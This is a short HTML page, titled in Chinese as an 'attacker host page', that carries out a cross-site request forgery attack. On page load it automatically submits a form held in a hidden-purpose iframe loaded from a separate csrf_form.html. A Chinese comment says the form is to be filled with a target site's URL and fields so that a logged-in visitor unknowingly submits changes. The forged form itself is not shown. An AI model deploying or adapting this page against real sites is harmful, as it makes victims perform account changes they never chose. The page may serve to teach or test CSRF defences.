<!DOCTYPE html>
<html>
<head>

    <meta charset="utf-8">
    <title>攻击者主机页面</title>
    <basetarget="_parent" />
    <script type="text/javascript">
        function csrf()
        {
            window.frames['steal'].document.forms[0].submit();
        }
    </script>
</head>
<body onload="csrf()">

<!-- 在表单中设置相应的网站的 URL， 表单字段，
        当用户登录那个网站后， 访问这个连接就可以进行相当  用户的提交修改 -->
<iframe align="center"  display="block" src="./csrf_form.html" name="steal" width="800" height="800" >

</iframe>
</body>
</html>